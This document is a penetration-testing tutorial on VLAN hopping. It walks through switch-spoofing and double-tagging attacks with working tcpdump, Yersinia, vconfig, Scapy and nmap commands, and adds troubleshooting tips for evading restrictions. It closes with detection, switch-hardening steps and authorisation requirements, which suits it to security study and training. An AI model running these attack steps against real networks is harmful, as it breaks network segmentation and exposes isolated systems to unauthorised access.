VLAN Hopping

Understanding VLAN Hopping - Bypassing Network Segmentation

What is VLAN Hopping?

Simple Definition: VLAN hopping is a network attack that allows an attacker to send traffic from one VLAN to another without going through a router, bypassing the network segmentation that VLANs are designed to provide.

Technical Definition: VLAN hopping exploits misconfigurations in VLAN trunking protocols or native VLAN settings to traverse VLAN boundaries, enabling unauthorized access to isolated network segments through switch spoofing or double-tagging techniques.

Why VLAN Hopping Works

VLAN hopping succeeds due to specific switch configuration weaknesses:

  • Auto-Trunking Protocols: Dynamic Trunking Protocol (DTP) automatically negotiates trunk links without authentication
  • Native VLAN Misuse: Default native VLAN (usually VLAN 1) processes untagged frames
  • Double-Tagging Vulnerability: Switches strip only the outer VLAN tag, forwarding inner-tagged frames
  • Default Configurations: Many switches ship with insecure default settings enabling these attacks

Attack Process Breakdown

Switch Spoofing Method

  1. DTP Negotiation: Attacker sends DTP frames claiming to be a switch
  2. Trunk Establishment: Target switch agrees to form trunk link
  3. Multi-VLAN Access: Attacker gains access to all VLANs on trunk
  4. Traffic Interception: Can send and receive traffic on any accessible VLAN

Double-Tagging Method

  1. Craft Double-Tagged Frame: Create frame with two 802.1Q VLAN tags
  2. Outer Tag Stripped: First switch removes outer tag (native VLAN)
  3. Inner Tag Processed: Second switch forwards based on inner tag
  4. VLAN Boundary Crossed: Frame reaches target VLAN without routing

Real-World Impact

Network Segmentation Bypass: Access sensitive VLANs (management, finance, servers) from guest networks

Lateral Movement: Move between network segments during penetration testing or attacks

Data Exfiltration: Access isolated databases or file servers on protected VLANs

Compliance Violations: Breach of network segmentation required by PCI-DSS, HIPAA

Service Disruption: Send malicious traffic to critical infrastructure VLANs

Technical Concepts

VLAN Fundamentals

802.1Q Tagging: Industry standard adding 4-byte tag to Ethernet frames containing VLAN ID (12 bits = 4096 possible VLANs)

Trunk vs Access Ports:

  • Access ports: Belong to single VLAN, tags removed before sending to host
  • Trunk ports: Carry multiple VLANs, maintain tags between switches

Native VLAN: Carries untagged traffic on trunk links, typically VLAN 1 by default

Dynamic Trunking Protocol (DTP)

Negotiation Modes:

  • Dynamic Auto: Becomes trunk if other side initiates
  • Dynamic Desirable: Actively attempts to become trunk
  • Trunk: Always trunking
  • Access: Never trunking

Security Risk: DTP operates without authentication, trusting any device claiming to be a switch

Double-Tagging Mechanics

Frame Structure: [Ethernet Header][Outer 802.1Q][Inner 802.1Q][Data]

Processing Flow: Native VLAN switch strips outer tag → Frame with inner tag forwarded → Reaches unintended VLAN

Technical Implementation

Prerequisites

Network Requirements:

  • Access to network with VLANs configured
  • Switch port allowing DTP or in native VLAN
  • Knowledge of VLAN IDs in use

Essential Tools:

  • Yersinia: Comprehensive Layer 2 attack framework
  • Scapy: Packet crafting for double-tagging
  • Vconfig: VLAN interface configuration
  • Tcpdump: Traffic verification

Essential Command Sequence

Step 1: VLAN Reconnaissance 

# Passive VLAN discovery through CDP/LLDP
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'
# Captures Cisco Discovery Protocol frames
# May reveal VLAN information and trunk status

# Monitor for VLAN tagged traffic
tcpdump -ni eth0 -e vlan
# -e: Show link-level header with VLAN tags
# Identifies active VLANs from observed traffic

# Check if port accepts tagged frames
vconfig add eth0 100
# Attempts to create VLAN 100 interface
# Success indicates port processes VLAN tags
ifconfig eth0.100 up
ping -c 1 -I eth0.100 192.168.100.1

Purpose: Identify VLAN configuration and determine if port allows VLAN manipulation before launching attacks.

Step 2: Test for DTP Vulnerability 

# Listen for DTP frames
tcpdump -nn -v -i eth0 'ether[20:2] == 0x2004'
# DTP frames indicate dynamic trunking enabled
# If seen, port vulnerable to switch spoofing

# Check current port mode
# If you see DTP frames being sent by switch:
# - Port is in dynamic mode
# - Vulnerable to trunk negotiation

Purpose: Determine if target switch has DTP enabled and will negotiate trunk connections.

Step 3: Execute Switch Spoofing Attack

Using Yersinia:

# Launch Yersinia interactive mode
yersinia -I
# Select: DTP protocol
# Choose: "enabling trunking" attack
# Sends DTP desirable frames to negotiate trunk

# Command-line DTP attack
yersinia dtp -attack 1
# Attack 1: Send DTP desirable packets
# Attempts to establish trunk with switch
# Monitor with tcpdump for success

Manual Trunk Configuration (if DTP succeeds):

# After trunk established, configure VLAN interfaces
for vlan in 10 20 30 100 200; do
    vconfig add eth0 $vlan
    ifconfig eth0.$vlan up
done
# Creates interfaces for multiple VLANs
# Each interface can access respective VLAN

# Assign IP addresses for each VLAN
ifconfig eth0.10 192.168.10.50/24
ifconfig eth0.20 192.168.20.50/24
# Now can communicate with devices in these VLANs

Step 4: Execute Double-Tagging Attack

Using Scapy for Double-Tagging:

#!/usr/bin/env python3
from scapy.all import *

# Craft double-tagged packet
# Outer tag: Native VLAN (usually 1)
# Inner tag: Target VLAN (e.g., 100)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="192.168.100.5")/ICMP()

# Send the double-tagged frame
sendp(packet, iface="eth0")

Manual Double-Tagging with Packet Crafting:

# Using Yersinia for double-tagging
yersinia dot1q -attack 1 -source 00:11:22:33:44:55 \
    -dest ff:ff:ff:ff:ff:ff -vlan1 1 -vlan2 100
# -vlan1: Outer tag (native VLAN)
# -vlan2: Inner tag (target VLAN)
# Packet reaches VLAN 100 without routing

Step 5: Verify VLAN Access 

# Test connectivity to different VLANs
for vlan in 10 20 30; do
    echo "Testing VLAN $vlan..."
    ping -c 2 -I eth0.$vlan 192.168.$vlan.1
    arping -I eth0.$vlan 192.168.$vlan.1
done
# Successful pings confirm VLAN access

# Scan discovered VLANs for hosts
nmap -sn 192.168.10.0/24 --interface eth0.10
# Discovers hosts on accessed VLAN
# Reveals previously isolated systems

# Monitor traffic on specific VLAN
tcpdump -ni eth0.100
# Captures traffic from target VLAN
# Confirms successful VLAN hopping

Purpose: Confirm successful VLAN boundary traversal and enumerate accessible resources.

Attack Variations

Native VLAN Modification 

# Change native VLAN on trunk (if accessible)
# This varies by switch vendor
# Generally requires switch access

# Monitor native VLAN traffic
tcpdump -ni eth0 not vlan
# Untagged traffic belongs to native VLAN
# Useful for identifying native VLAN number

VLAN Range Scanning 

# Systematically test VLAN accessibility
for vlan in {1..4096}; do
    vconfig add eth0 $vlan 2>/dev/null
    timeout 1 arping -c 1 -I eth0.$vlan 192.168.1.1 2>/dev/null && \
        echo "VLAN $vlan is accessible"
    vconfig rem eth0.$vlan 2>/dev/null
done
# Discovers all accessible VLANs
# Time-consuming but thorough

Private VLAN Attacks 

# Test for private VLAN vulnerabilities
# Attempt communication between isolated ports
# If successful, private VLANs misconfigured

# Create interfaces for primary/secondary VLANs
vconfig add eth0 100  # Primary VLAN
vconfig add eth0 101  # Isolated VLAN
vconfig add eth0 102  # Community VLAN

Common Issues and Solutions

Problem: DTP frames sent but no trunk established

  • Solution: Try different source MAC addresses, some switches have MAC-based restrictions

Problem: Double-tagging packets not reaching target

  • Solution: Verify native VLAN configuration, ensure outer tag matches native VLAN

Problem: VLAN interfaces created but no connectivity

  • Solution: Check if port security limits MAC addresses, verify VLAN is actually in use

Problem: Limited to one-way communication with double-tagging

  • Solution: Double-tagging typically allows only outbound traffic, combine with other techniques

Detection and Prevention

Detection Indicators

  • Unexpected DTP frames from non-switch devices
  • Multiple VLAN tags in single frame
  • Traffic from unauthorized VLANs
  • New trunk ports appearing without administrator action
  • ARP requests from multiple VLANs on access ports

Prevention Measures

Disable DTP:

switchport nonegotiate
switchport mode access

Explicit Trunk Configuration:

  • Manually configure trunk ports
  • Never use dynamic modes
  • Disable unused ports

Native VLAN Security:

  • Change native VLAN from default (VLAN 1)
  • Use dedicated VLAN for native traffic
  • Tag native VLAN on trunks

VLAN Access Control Lists (VACLs):

  • Filter traffic between VLANs
  • Implement at switch level
  • More granular than router ACLs

Private VLANs:

  • Isolate hosts within same VLAN
  • Limit lateral movement
  • Protect sensitive systems

Professional Context

Legitimate Use Cases

  • Security Assessments: Testing VLAN segmentation effectiveness
  • Network Auditing: Identifying misconfigured trunk ports
  • Compliance Testing: Verifying network isolation requirements
  • Architecture Validation: Confirming VLAN design implementation

Legal and Ethical Requirements

Authorization: VLAN hopping may access sensitive network segments - explicit permission essential

Scope Definition: Clearly identify which VLANs are in-scope for testing

Data Protection: Accessing unintended VLANs may expose sensitive data requiring careful handling

Impact Assessment: Document potential for disruption to critical services on accessed VLANs

VLAN hopping attacks demonstrate that network segmentation alone is insufficient without proper switch security configuration, emphasizing the need for defense-in-depth strategies in network design.